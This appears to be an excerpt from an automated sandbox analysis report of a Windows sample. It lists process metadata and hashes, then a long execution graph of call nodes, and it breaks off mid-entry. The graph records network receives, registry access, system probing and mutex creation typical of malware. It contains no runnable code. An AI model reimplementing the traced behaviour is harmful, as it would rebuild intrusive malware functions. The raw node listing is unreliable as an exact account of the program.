                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                                            Start time:15:10:01
                                                                                                                                                                                                                                            Start date:09/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:4.6%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:2.7%
                                                                                                                                                                                                                                              Total number of Nodes:767
                                                                                                                                                                                                                                              Total number of Limit Nodes:16
                                                                                                                                                                                                                                              execution_graph 11811 f4a9f4 11820 f49230 11811->11820 11813 f4aa03 shared_ptr 11814 f45c10 6 API calls 11813->11814 11819 f4aab3 shared_ptr std::invalid_argument::invalid_argument 11813->11819 11815 f4aa65 11814->11815 11816 f45c10 6 API calls 11815->11816 11817 f4aa8d 11816->11817 11818 f45c10 6 API calls 11817->11818 11818->11819 11823 f49284 shared_ptr 11820->11823 11821 f45c10 6 API calls 11821->11823 11822 f49543 shared_ptr std::invalid_argument::invalid_argument 11822->11813 11823->11821 11828 f4944f shared_ptr 11823->11828 11824 f45c10 6 API calls 11824->11828 11825 f498b5 shared_ptr std::invalid_argument::invalid_argument 11825->11813 11826 f4979f shared_ptr 11826->11825 11827 f45c10 6 API calls 11826->11827 11829 f49927 shared_ptr std::invalid_argument::invalid_argument 11827->11829 11828->11822 11828->11824 11828->11826 11829->11813 11779 f44276 11780 f42410 5 API calls 11779->11780 11781 f4427f 11780->11781 11643 f442b0 11646 f43ac0 11643->11646 11645 f442bb shared_ptr 11648 f43af9 11646->11648 11647 f43b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11647->11645 11648->11647 11649 f43c38 11648->11649 11656 f432d0 11648->11656 11651 f432d0 6 API calls 11649->11651 11653 f43c5f 11649->11653 11651->11653 11652 f43c68 11652->11645 11653->11652 11675 f43810 11653->11675 11657 f5c6ac GetSystemTimePreciseAsFileTime 11656->11657 11663 f43314 11657->11663 11658 f4336b 11659 f5c26a 5 API calls 11658->11659 11660 f4333c __Mtx_unlock 11659->11660 11662 f5c26a 5 API calls 11660->11662 11666 f43350 std::invalid_argument::invalid_argument 11660->11666 11664 f43377 11662->11664 11663->11658 11663->11660 11679 f5bd4c 11663->11679 11665 f5c6ac GetSystemTimePreciseAsFileTime 11664->11665 11667 f433af 11665->11667 11666->11649 11668 f5c26a 5 API calls 11667->11668 11669 f433b6 __Cnd_broadcast 11667->11669 11668->11669 11670 f5c26a 5 API calls 11669->11670 11671 f433d7 __Mtx_unlock 11669->11671 11670->11671 11672 f5c26a 5 API calls 11671->11672 11673 f433eb 11671->11673 11674 f4340e 11672->11674 11673->11649 11674->11649 11676 f4381c 11675->11676 11688 f42440 11676->11688 11682 f5bb72 11679->11682 11681 f5bd5c 11681->11663 11683 f5bb9c 11682->11683 11684 f5cf6b _xtime_get GetSystemTimePreciseAsFileTime 11683->11684 11687 f5bba4 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 11683->11687 11685 f5bbcf __Xtime_diff_to_millis2 11684->11685 11686 f5cf6b _xtime_get GetSystemTimePreciseAsFileTime 11685->11686 11685->11687 11686->11687 11687->11681 11691 f5b5d6 11688->11691 11690 f42472 11692 f5b5f1 std::_Throw_future_error 11691->11692 11693 f78bec __fassign 4 API calls 11692->11693 11695 f5b658 __fassign std::invalid_argument::invalid_argument 11692->11695 11694 f5b69f 11693->11694 11695->11690 11984 f477b0 11985 f477f1 shared_ptr 11984->11985 11986 f45c10 6 API calls 11985->11986 11987 f47883 shared_ptr 11985->11987 11986->11987 11988 f45c10 6 API calls 11987->11988 11989 f47953 shared_ptr std::invalid_argument::invalid_argument 11987->11989 11990 f479e3 11988->11990 11991 f45c10 6 API calls 11990->11991 11992 f47a15 shared_ptr 11991->11992 11993 f45c10 6 API calls 11992->11993 11998 f47aa5 shared_ptr std::invalid_argument::invalid_argument 11992->11998 11994 f47b7d 11993->11994 11995 f45c10 6 API calls 11994->11995 11996 f47ba0 11995->11996 11997 f45c10 6 API calls 11996->11997 11997->11998 11999 f487b0 12000 f487b6 11999->12000 12001 f487b8 GetFileAttributesA 11999->12001 12000->12001 12002 f487c4 12001->12002 12077 f42170 12080 f5c6fc 12077->12080 12079 f4217a 12081 f5c70c 12080->12081 12083 f5c724 12080->12083 12081->12083 12084 f5cfbe 12081->12084 12083->12079 12085 f5ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12084->12085 12086 f5cfd0 12085->12086 12086->12081 12087 f4ad70 12088 f4addc shared_ptr 12087->12088 12089 f4aec0 shared_ptr std::invalid_argument::invalid_argument 12087->12089 12088->12089 12091 f78ab6 12088->12091 12092 f78ad1 12091->12092 12093 f78868 4 API calls 12092->12093 12094 f78adb 12093->12094 12094->12088 12116 f48d30 12117 f48d7f 12116->12117 12118 f45c10 6 API calls 12117->12118 12119 f48d9a shared_ptr std::invalid_argument::invalid_argument 12118->12119 12003 f547b0 12005 f54eed 12003->12005 12004 f54f59 shared_ptr std::invalid_argument::invalid_argument 12005->12004 12006 f47d30 7 API calls 12005->12006 12007 f550ed 12006->12007 12042 f48380 12007->12042 12009 f55106 12010 f45c10 6 API calls 12009->12010 12011 f55155 12010->12011 12012 f45c10 6 API calls 12011->12012 12013 f55171 12012->12013 12048 f49a00 12013->12048 12043 f483e5 __cftof 12042->12043 12044 f45c10 6 API calls 12043->12044 12047 f48403 shared_ptr std::invalid_argument::invalid_argument 12043->12047 12045 f48427 12044->12045 12046 f45c10 6 API calls 12045->12046 12046->12047 12047->12009 12049 f49a3f 12048->12049 12050 f45c10 6 API calls 12049->12050 12051 f49a47 12050->12051 12052 f48b30 6 API calls 12051->12052 12053 f49a58 12052->12053 11537 f487b2 11538 f487b6 11537->11538 11539 f487b8 GetFileAttributesA 11537->11539 11538->11539 11540 f487c4 11539->11540 11700 f49ab8 11702 f49acc 11700->11702 11703 f49b08 11702->11703 11704 f49b4b shared_ptr 11703->11704 11707 f4a917 11703->11707 11705 f49b59 11704->11705 11708 f45c10 6 API calls 11704->11708 11706 f4a953 Sleep CreateMutexA 11709 f4a98e 11706->11709 11707->11706 11710 f49b7c 11708->11710 11711 f48b30 6 API calls 11710->11711 11712 f49b8d 11711->11712 11713 f45c10 6 API calls 11712->11713 11714 f49cb1 11713->11714 11715 f48b30 6 API calls 11714->11715 11716 f49cc2 11715->11716 12054 f49ba5 12055 f49ba7 12054->12055 12056 f45c10 6 API calls 12055->12056 12057 f49cb1 12056->12057 12058 f48b30 6 API calls 12057->12058 12059 f49cc2 12058->12059 11478 f4b1a0 11479 f4b1f2 11478->11479 11480 f4b3ad CoInitialize 11479->11480 11481 f4b3fa shared_ptr std::invalid_argument::invalid_argument 11480->11481 11717 f420a0 11718 f5c68b __Mtx_init_in_situ 2 API calls 11717->11718 11719 f420ac 11718->11719 11830 f43fe0 11831 f44022 11830->11831 11832 f440d2 11831->11832 11833 f4408c 11831->11833 11836 f44035 std::invalid_argument::invalid_argument 11831->11836 11843 f43ee0 11832->11843 11837 f435e0 11833->11837 11838 f43616 11837->11838 11842 f4364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 11838->11842 11849 f42ce0 11838->11849 11840 f4369e 11840->11842 11858 f42c00 11840->11858 11842->11836 11844 f43f1e 11843->11844 11845 f43f48 11843->11845 11844->11836 11846 f43f58 11845->11846 11847 f42c00 3 API calls 11845->11847 11846->11836 11848 f43f7f 11847->11848 11848->11836 11850 f42d1d 11849->11850 11851 f5bedf InitOnceExecuteOnce 11850->11851 11852 f42d46 11851->11852 11853 f42d88 11852->11853 11854 f42d51 std::invalid_argument::invalid_argument 11852->11854 11865 f5bef7 11852->11865 11856 f42440 4 API calls 11853->11856 11854->11840 11857 f42d9b 11856->11857 11857->11840 11859 f42c0e 11858->11859 11878 f5b847 11859->11878 11861 f42c42 11862 f42c49 11861->11862 11884 f42c80 11861->11884 11862->11842 11864 f42c58 std::_Throw_future_error 11866 f5bf03 std::_Throw_future_error 11865->11866 11867 f5bf73 11866->11867 11868 f5bf6a 11866->11868 11870 f42ae0 5 API calls 11867->11870 11872 f5be7f 11868->11872 11871 f5bf6f 11870->11871 11871->11853 11873 f5cc31 InitOnceExecuteOnce 11872->11873 11874 f5be97 11873->11874 11875 f5be9e 11874->11875 11876 f76cbb 4 API calls 11874->11876 11875->11871 11877 f5bea7 11876->11877 11877->11871 11879 f5b854 11878->11879 11882 f5b873 Concurrency::details::_Reschedule_chore 11878->11882 11887 f5cb77 11879->11887 11881 f5b864 11881->11882 11889 f5b81e 11881->11889 11882->11861 11895 f5b7fb 11884->11895 11886 f42cb2 shared_ptr 11886->11864 11888 f5cb92 CreateThreadpoolWork 11887->11888 11888->11881 11890 f5b827 Concurrency::details::_Reschedule_chore 11889->11890 11893 f5cdcc 11890->11893 11892 f5b841 11892->11882 11894 f5cde1 TpPostWork 11893->11894 11894->11892 11896 f5b807 11895->11896 11897 f5b817 11895->11897 11896->11897 11899 f5ca78 11896->11899 11897->11886 11900 f5ca8d TpReleaseWork 11899->11900 11900->11897 12120 f44120 12121 f4416a 12120->12121 12122 f441b2 std::invalid_argument::invalid_argument 12121->12122 12123 f43ee0 3 API calls 12121->12123 12123->12122 12124 f4af20 12125 f4af63 12124->12125 12136 f76660 12125->12136 12130 f7663f 4 API calls 12131 f4af80 12130->12131 12132 f7663f 4 API calls 12131->12132 12133 f4af98 __cftof 12132->12133 12142 f455f0 12133->12142 12135 f4b04e shared_ptr std::invalid_argument::invalid_argument 12137 f7a671 __fassign 4 API calls 12136->12137 12138 f4af69 12137->12138 12139 f7663f 12138->12139 12140 f7a671 __fassign 4 API calls 12139->12140 12141 f4af71 12140->12141 12141->12130 12144 f45610 12142->12144 12145 f45710 std::invalid_argument::invalid_argument 12144->12145 12146 f422c0 12144->12146 12145->12135 12149 f42280 12146->12149 12150 f42296 12149->12150 12153 f787f8 12150->12153 12156 f77609 12153->12156 12155 f422a4 12155->12144 12157 f77649 12156->12157 12161 f77631 ___std_exception_copy std::invalid_argument::invalid_argument 12156->12161 12158 f7690a __fassign 4 API calls 12157->12158 12157->12161 12159 f77661 12158->12159 12162 f77bc4 12159->12162 12161->12155 12164 f77bd5 12162->12164 12163 f77be4 ___std_exception_copy 12163->12161 12164->12163 12169 f78168 12164->12169 12174 f77dc2 12164->12174 12179 f77de8 12164->12179 12189 f77f36 12164->12189 12170 f78171 12169->12170 12171 f78178 12169->12171 12198 f77b50 12170->12198 12171->12164 12173 f78177 12173->12164 12175 f77dcb 12174->12175 12177 f77dd2 12174->12177 12176 f77b50 4 API calls 12175->12176 12178 f77dd1 12176->12178 12177->12164 12178->12164 12180 f77e09 ___std_exception_copy 12179->12180 12184 f77def 12179->12184 12180->12164 12181 f77f69 12186 f77f77 12181->12186 12188 f77f8b 12181->12188 12206 f78241 12181->12206 12183 f77fa2 12183->12188 12202 f78390 12183->12202 12184->12180 12184->12181 12184->12183 12184->12186 12186->12188 12210 f786ea 12186->12210 12188->12164 12190 f77f69 12189->12190 12191 f77f4f 12189->12191 12192 f78241 4 API calls 12190->12192 12194 f77f8b 12190->12194 12196 f77f77 12190->12196 12191->12190 12193 f77fa2 12191->12193 12191->12196 12192->12196 12193->12194 12195 f78390 4 API calls 12193->12195 12194->12164 12195->12196 12196->12194 12197 f786ea 4 API calls 12196->12197 12197->12194 12199 f77b62 12198->12199 12200 f78ab6 4 API calls 12199->12200 12201 f77b85 12200->12201 12201->12173 12203 f783ab 12202->12203 12204 f783dd 12203->12204 12214 f7c88e 12203->12214 12204->12186 12207 f7825a 12206->12207 12221 f7d3c8 12207->12221 12209 f7830d 12209->12186 12209->12209 12211 f78707 12210->12211 12212 f7875d std::invalid_argument::invalid_argument 12210->12212 12211->12212 12213 f7c88e __cftof 4 API calls 12211->12213 12212->12188 12213->12211 12217 f7c733 12214->12217 12216 f7c8a6 12216->12204 12218 f7c743 12217->12218 12219 f7690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12218->12219 12220 f7c748 __cftof ___std_exception_copy 12218->12220 12219->12220 12220->12216 12222 f7d3d8 ___std_exception_copy 12221->12222 12224 f7d3ee 12221->12224 12222->12209 12223 f7d485 12227 f7d4e4 12223->12227 12228 f7d4ae 12223->12228 12224->12222 12224->12223 12225 f7d48a 12224->12225 12234 f7cbdf 12225->12234 12251 f7cef8 12227->12251 12230 f7d4b3 12228->12230 12231 f7d4cc 12228->12231 12240 f7d23e 12230->12240 12247 f7d0e2 12231->12247 12235 f7cbf1 12234->12235 12236 f7690a __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12235->12236 12237 f7cc05 12236->12237 12238 f7cef8 GetPEB ExitProcess GetPEB RtlAllocateHeap 12237->12238 12239 f7cc0d __alldvrm __cftof ___std_exception_copy _strrchr 12237->12239 12238->12239 12239->12222 12242 f7d26c 12240->12242 12241 f7d2a5 12241->12222 12242->12241 12243 f7d2de 12242->12243 12244 f7d2b7 12242->12244 12245 f7cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 12243->12245 12246 f7d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 12244->12246 12245->12241 12246->12241 12248 f7d10f 12247->12248 12249 f7d14e 12248->12249 12250 f7d16d GetPEB ExitProcess GetPEB RtlAllocateHeap 12248->12250 12249->12222 12250->12249 12252 f7cf10 12251->12252 12253 f7cf75 12252->12253 12254 f7cf9a GetPEB ExitProcess GetPEB RtlAllocateHeap 12252->12254 12253->12222 12254->12253 11541 f76629 11542 f764c7 __fassign 3 API calls 11541->11542 11543 f7663a 11542->11543 11278 f4a856 11279 f4a870 11278->11279 11280 f4a892 shared_ptr 11278->11280 11279->11280 11282 f4a94e 11279->11282 11285 f4a8a0 11280->11285 11294 f47d30 11280->11294 11284 f4a953 Sleep CreateMutexA 11282->11284 11283 f4a8ae 11283->11285 11286 f47d30 7 API calls 11283->11286 11287 f4a98e 11284->11287 11288 f4a8b8 11286->11288 11288->11285 11289 f47d30 7 API calls 11288->11289 11290 f4a8c2 11289->11290 11290->11285 11291 f47d30 7 API calls 11290->11291 11292 f4a8cc 11291->11292 11292->11285 11293 f47d30 7 API calls 11292->11293 11293->11285 11295 f47d96 __cftof 11294->11295 11332 f47ee8 shared_ptr std::invalid_argument::invalid_argument 11295->11332 11333 f45c10 11295->11333 11297 f47dd2 11298 f45c10 6 API calls 11297->11298 11299 f47dff shared_ptr 11298->11299 11300 f47ed3 GetNativeSystemInfo 11299->11300 11301 f47ed7 11299->11301 11299->11332 11300->11301 11302 f47f3f 11301->11302 11303 f48019 11301->11303 11301->11332 11304 f45c10 6 API calls 11302->11304 11305 f45c10 6 API calls 11303->11305 11306 f47f67 11304->11306 11307 f4804c 11305->11307 11309 f45c10 6 API calls 11306->11309 11308 f45c10 6 API calls 11307->11308 11310 f4806b 11308->11310 11311 f47f86 11309->11311 11313 f45c10 6 API calls 11310->11313 11343 f78bbe 11311->11343 11314 f480a3 11313->11314 11315 f45c10 6 API calls 11314->11315 11316 f480f4 11315->11316 11317 f45c10 6 API calls 11316->11317 11318 f48113 11317->11318 11319 f45c10 6 API calls 11318->11319 11320 f4814b 11319->11320 11321 f45c10 6 API calls 11320->11321 11322 f4819c 11321->11322 11323 f45c10 6 API calls 11322->11323 11324 f481bb 11323->11324 11325 f45c10 6 API calls 11324->11325 11326 f481f3 11325->11326 11327 f45c10 6 API calls 11326->11327 11328 f48244 11327->11328 11329 f45c10 6 API calls 11328->11329 11330 f48263 11329->11330 11331 f45c10 6 API calls 11330->11331 11331->11332 11332->11283 11334 f45c54 11333->11334 11346 f44b30 11334->11346 11336 f45d17 shared_ptr std::invalid_argument::invalid_argument 11336->11297 11337 f45c7b __cftof 11337->11336 11338 f45da7 RegOpenKeyExA 11337->11338 11339 f45e00 RegCloseKey 11338->11339 11341 f45e26 11339->11341 11340 f45ea6 shared_ptr std::invalid_argument::invalid_argument 11340->11297 11341->11340 11342 f45c10 4 API calls 11341->11342 11472 f78868 11343->11472 11345 f78bdc 11345->11332 11348 f44ce5 11346->11348 11349 f44b92 11346->11349 11348->11337 11349->11348 11350 f76da6 11349->11350 11351 f76db4 11350->11351 11352 f76dc2 __fassign 11350->11352 11355 f76d19 11351->11355 11352->11349 11360 f7690a 11355->11360 11359 f76d3d 11359->11349 11361 f76921 11360->11361 11362 f7692a 11360->11362 11368 f76d52 11361->11368 11362->11361 11374 f7a671 11362->11374 11369 f76d8f 11368->11369 11370 f76d5f 11368->11370 11464 f7b67d 11369->11464 11373 f76d6e __fassign 11370->11373 11459 f7b6a1 11370->11459 11373->11359 11375 f7a67b __fassign 11374->11375 11379 f7a694 __fassign ___free_lconv_mon 11375->11379 11389 f7d82f 11375->11389 11377 f7694a 11381 f7b5fb 11377->11381 11379->11377 11393 f78bec 11379->11393 11382 f76960 11381->11382 11383 f7b60e 11381->11383 11385 f7b628 11382->11385 11383->11382 11424 f7f5ab 11383->11424 11386 f7b650 11385->11386 11387 f7b63b 11385->11387 11386->11361 11387->11386 11431 f7e6b1 11387->11431 11392 f7d83c __fassign 11389->11392 11390 f7d867 RtlAllocateHeap 11391 f7d87a 11390->11391 11390->11392 11391->11379 11392->11390 11392->11391 11394 f78bf1 __fassign 11393->11394 11398 f78bfc __fassign 11394->11398 11399 f7d634 11394->11399 11413 f765ed 11398->11413 11401 f7d640 __fassign 11399->11401 11400 f7d69c ___std_exception_copy 11400->11398 11401->11400 11402 f7d726 11401->11402 11403 f7d81b __fassign 11401->11403 11405 f7d751 __fassign 11401->11405 11402->11405 11416 f7d62b 11402->11416 11404 f765ed __fassign 3 API calls 11403->11404 11408 f7d82e 11404->11408 11405->11400 11406 f7d7a5 11405->11406 11409 f7a671 __fassign 4 API calls 11405->11409 11406->11400 11412 f7a671 __fassign 4 API calls 11406->11412 11409->11406 11411 f7d62b __fassign 4 API calls 11411->11405 11412->11400 11419 f764c7 11413->11419 11417 f7a671 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11416->11417 11418 f7d630 11417->11418 11418->11411 11421 f764d5 __fassign 11419->11421 11420 f76520 11421->11420 11422 f7652b __fassign GetPEB ExitProcess GetPEB 11421->11422 11423 f7652a 11422->11423 11425 f7f5b7 __fassign 11424->11425 11426 f7a671 __fassign 4 API calls 11425->11426 11428 f7f5c0 __fassign 11426->11428 11427 f7f606 11427->11382 11428->11427 11429 f78bec __fassign 4 API calls 11428->11429 11430 f7f62b 11429->11430 11432 f7a671 __fassign 4 API calls 11431->11432 11433 f7e6bb 11432->11433 11436 f7e5c9 11433->11436 11435 f7e6c1 11435->11386 11437 f7e5d5 __fassign ___free_lconv_mon 11436->11437 11438 f78bec __fassign 4 API calls 11437->11438 11439 f7e5f6 11437->11439 11440 f7e668 11438->11440 11439->11435 11441 f7e6a4 11440->11441 11445 f7a72e 11440->11445 11441->11435 11446 f7a739 __fassign 11445->11446 11447 f7a745 __fassign ___free_lconv_mon 11446->11447 11448 f7d82f __fassign RtlAllocateHeap 11446->11448 11449 f78bec __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11447->11449 11451 f7a7be 11447->11451 11448->11447 11450 f7a7c7 11449->11450 11452 f7e4b0 11451->11452 11453 f7e5c9 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11452->11453 11454 f7e4c3 11453->11454 11455 f7e259 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11454->11455 11456 f7e4cb __fassign 11455->11456 11457 f7e6c4 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 11456->11457 11458 f7e4dc __fassign ___free_lconv_mon 11456->11458 11457->11458 11458->11441 11460 f7690a __fassign 4 API calls 11459->11460 11461 f7b6be 11460->11461 11463 f7b6ce std::invalid_argument::invalid_argument 11461->11463 11469 f7f1bf 11461->11469 11463->11373 11465 f7a671 __fassign 4 API calls 11464->11465 11466 f7b688 11465->11466 11467 f7b5fb __fassign 4 API calls 11466->11467 11468 f7b698 11467->11468 11468->11373 11470 f7690a __fassign 4 API calls 11469->11470 11471 f7f1df __cftof __fassign __freea std::invalid_argument::invalid_argument 11470->11471 11471->11463 11473 f7887a 11472->11473 11474 f7690a __fassign 4 API calls 11473->11474 11477 f7888f ___std_exception_copy 11473->11477 11476 f788bf 11474->11476 11475 f76d52 4 API calls 11475->11476 11476->11475 11476->11477 11477->11345 12065 f42b90 12066 f42bce 12065->12066 12067 f5b7fb TpReleaseWork 12066->12067 12068 f42bdb shared_ptr std::invalid_argument::invalid_argument 12067->12068 12255 f5d111 12256 f5d122 12255->12256 12257 f5d12a 12256->12257 12259 f5d199 12256->12259 12260 f5d1a7 SleepConditionVariableCS 12259->12260 12262 f5d1c0 12259->12262 12260->12262 12262->12256 12263 f42b10 12264 f42b1c 12263->12264 12265 f42b1a 12263->12265 12266 f5c26a 5 API calls 12264->12266 12267 f42b22 12266->12267 11901 f587d0 11902 f5882a __cftof 11901->11902 11908 f59bb0 11902->11908 11906 f588d9 std::_Throw_future_error 11907 f5886c std::invalid_argument::invalid_argument 11921 f59ef0 11908->11921 11910 f59be5 11911 f42ce0 5 API calls 11910->11911 11912 f59c16 11911->11912 11925 f59f70 11912->11925 11914 f58854 11914->11907 11915 f443f0 11914->11915 11916 f5bedf InitOnceExecuteOnce 11915->11916 11917 f4440a 11916->11917 11918 f44411 11917->11918 11919 f76cbb 4 API calls 11917->11919 11918->11906 11920 f44424 11919->11920 11922 f59f0c 11921->11922 11923 f5c68b __Mtx_init_in_situ 2 API calls 11922->11923 11924 f59f17 11923->11924 11924->11910 11926 f59fef shared_ptr 11925->11926 11928 f5a058 11926->11928 11930 f5a210 11926->11930 11929 f5a03b 11929->11914 11931 f5a290 11930->11931 11937 f571d0 11931->11937 11933 f5a4be shared_ptr 11933->11929 11934 f5a2cc shared_ptr 11934->11933 11935 f43ee0 3 API calls 11934->11935 11936 f5a4a6 11935->11936 11936->11929 11938 f57211 11937->11938 11945 f43970 11938->11945 11940 f572ad __cftof 11941 f5c68b __Mtx_init_in_situ 2 API calls 11940->11941 11944 f57446 std::invalid_argument::invalid_argument 11940->11944 11942 f57401 11941->11942 11950 f42ec0 11942->11950 11944->11934 11946 f5c68b __Mtx_init_in_situ 2 API calls 11945->11946 11947 f439a7 11946->11947 11948 f5c68b __Mtx_init_in_situ 2 API calls 11947->11948 11949 f439e6 11948->11949 11949->11940 11951 f42f06 11950->11951 11955 f42f6f 11950->11955 11952 f5c6ac GetSystemTimePreciseAsFileTime 11951->11952 11953 f42f12 11952->11953 11954 f4301e 11953->11954 11960 f42f1d __Mtx_unlock 11953->11960 11957 f5c26a 5 API calls 11954->11957 11956 f42fef 11955->11956 11961 f5c6ac GetSystemTimePreciseAsFileTime 11955->11961 11956->11944 11958 f43024 11957->11958 11959 f5c26a 5 API calls 11958->11959 11962 f42fb9 11959->11962 11960->11955 11960->11958 11961->11962 11963 f5c26a 5 API calls 11962->11963 11964 f42fc0 __Mtx_unlock 11962->11964 11963->11964 11965 f5c26a 5 API calls 11964->11965 11966 f42fd8 __Cnd_broadcast 11964->11966 11965->11966 11966->11956 11967 f5c26a 5 API calls 11966->11967 11968 f4303c 11967->11968 11969 f5c6ac GetSystemTimePreciseAsFileTime 11968->11969 11979 f43080 shared_ptr __Mtx_unlock 11969->11979 11970 f431c5 11971 f5c26a 5 API calls 11970->11971 11972 f431cb 11971->11972 11973 f5c26a 5 API calls 11972->11973 11974 f431d1 11973->11974 11975 f5c26a 5 API calls 11974->11975 11981 f43193 __Mtx_unlock 11975->11981 11976 f431a7 std::invalid_argument::invalid_argument 11976->11944 11977 f5c26a 5 API calls 11978 f431dd 11977->11978 11979->11970 11979->11972 11979->11976 11980 f5c6ac GetSystemTimePreciseAsFileTime 11979->11980 11982 f4315f 11980->11982 11981->11976 11981->11977 11982->11970 11982->11974 11982->11981 11983 f5bd4c GetSystemTimePreciseAsFileTime 11982->11983 11983->11982 11548 f49adc 11551 f49aea shared_ptr 11548->11551 11549 f4a917 11550 f4a953 Sleep CreateMutexA 11549->11550 11552 f4a98e 11550->11552 11551->11549 11553 f49b4b shared_ptr 11551->11553 11554 f49b59 11553->11554 11555 f45c10 6 API calls 11553->11555 11556 f49b7c 11555->11556 11563 f48b30 11556->11563 11558 f49b8d 11559 f45c10 6 API calls 11558->11559 11560 f49cb1 11559->11560 11561 f48b30 6 API calls 11560->11561 11562 f49cc2 11561->11562 11564 f48b7c 11563->11564 11565 f45c10 6 API calls 11564->11565 11566 f48b97 shared_ptr std::invalid_argument::invalid_argument 11565->11566 11566->11558 12069 f43f9f 12070 f43fb6 12069->12070 12071 f43fad 12069->12071 12072 f42410 5 API calls 12071->12072 12072->12070 12095 f4215a 12096 f5c6fc InitializeCriticalSectionEx 12095->12096 12097 f42164 12096->12097 12098 f49f44 12099 f49f4c shared_ptr 12098->12099 12100 f4a953 Sleep CreateMutexA 12099->12100 12101 f4a01f shared_ptr 12099->12101 12102 f4a98e 12100->12102 11567 f5d0c7 11568 f5d0d7 11567->11568 11569 f5d17b RtlWakeAllConditionVariable 11568->11569 11570 f5d17f 11568->11570 11787 f76a44 11788 f76a52 11787->11788 11789 f76a5c 11787->11789 11792 f7698d 11789->11792 11791 f76a76 ___free_lconv_mon 11793 f7690a __fassign 4 API calls 11792->11793 11794 f7699f 11793->11794 11794->11791 11795 f43c47 11796 f43c51 11795->11796 11797 f43c5f 11796->11797 11798 f432d0 6 API calls 11796->11798 11799 f43c68 11797->11799 11800 f43810 4 API calls 11797->11800 11798->11797 11801 f43cdb 11800->11801 11482 f48780 11483 f48786 11482->11483 11489 f76729 11483->11489 11486 f487a6 11488 f487a0 11496 f76672 11489->11496 11491 f48793 11491->11486 11492 f767b7 11491->11492 11493 f767c3 __fassign 11492->11493 11494 f767cd ___std_exception_copy 11493->11494 11508 f76740 11493->11508 11494->11488 11497 f7667e __fassign 11496->11497 11499 f76685 ___std_exception_copy 11497->11499 11500 f7a8c3 11497->11500 11499->11491 11501 f7a8cf __fassign 11500->11501 11504 f7a967 11501->11504 11503 f7a8ea 11503->11499 11506 f7a98a 11504->11506 11505 f7d82f __fassign RtlAllocateHeap 11507 f7a9d0 ___free_lconv_mon 11505->11507 11506->11505 11506->11506 11506->11507 11507->11503 11509 f76762 11508->11509 11511 f7674d ___std_exception_copy ___free_lconv_mon 11508->11511 11509->11511 11512 f7a038 11509->11512 11511->11494 11513 f7a075 11512->11513 11514 f7a050 11512->11514 11513->11511 11514->11513 11516 f80439 11514->11516 11518 f80445 __fassign 11516->11518 11517 f8044d __dosmaperr ___std_exception_copy 11517->11513 11518->11517 11520 f8052b 11518->11520 11521 f8054d 11520->11521 11525 f80551 __dosmaperr ___std_exception_copy 11520->11525 11521->11525 11526 f800d2 11521->11526 11525->11517 11527 f800e3 11526->11527 11528 f80106 11527->11528 11529 f7a671 __fassign 4 API calls 11527->11529 11528->11525 11530 f7fcc0 11528->11530 11529->11528 11531 f7fd0d 11530->11531 11532 f7690a __fassign 4 API calls 11531->11532 11535 f7fd1c __cftof __fassign 11532->11535 11533 f7b67d 4 API calls 11533->11535 11534 f7ffbc std::invalid_argument::invalid_argument 11534->11525 11535->11533 11535->11534 11536 f7c719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 11535->11536 11536->11535 11571 f4e0c0 recv 11572 f4e122 recv 11571->11572 11573 f4e157 recv 11572->11573 11575 f4e191 11573->11575 11574 f4e2b3 std::invalid_argument::invalid_argument 11575->11574 11580 f5c6ac 11575->11580 11587 f5c452 11580->11587 11582 f4e2ee 11583 f5c26a 11582->11583 11584 f5c292 11583->11584 11585 f5c274 11583->11585 11584->11584 11585->11584 11604 f5c297 11585->11604 11588 f5c4a8 11587->11588 11590 f5c47a std::invalid_argument::invalid_argument 11587->11590 11588->11590 11593 f5cf6b 11588->11593 11590->11582 11591 f5c4fd __Xtime_diff_to_millis2 11591->11590 11592 f5cf6b _xtime_get GetSystemTimePreciseAsFileTime 11591->11592 11592->11591 11594 f5cf7a 11593->11594 11596 f5cf87 __aulldvrm 11593->11596 11594->11596 11597 f5cf44 11594->11597 11596->11591 11600 f5cbea 11597->11600 11601 f5cc07 11600->11601 11602 f5cbfb GetSystemTimePreciseAsFileTime 11600->11602 11601->11596 11602->11601 11607 f42ae0 11604->11607 11606 f5c2ae std::_Throw_future_error 11615 f5bedf 11607->11615 11609 f42aff 11609->11606 11610 f42af4 __fassign 11610->11609 11611 f7a671 __fassign 4 API calls 11610->11611 11613 f76ccc 11611->11613 11612 f78bec __fassign 4 API calls 11614 f76cf6 11612->11614 11613->11612 11618 f5cc31 11615->11618 11619 f5cc3f InitOnceExecuteOnce 11618->11619 11621 f5bef2 11618->11621 11619->11621 11621->11610 11622 f420c0 11625 f5c68b 11622->11625 11624 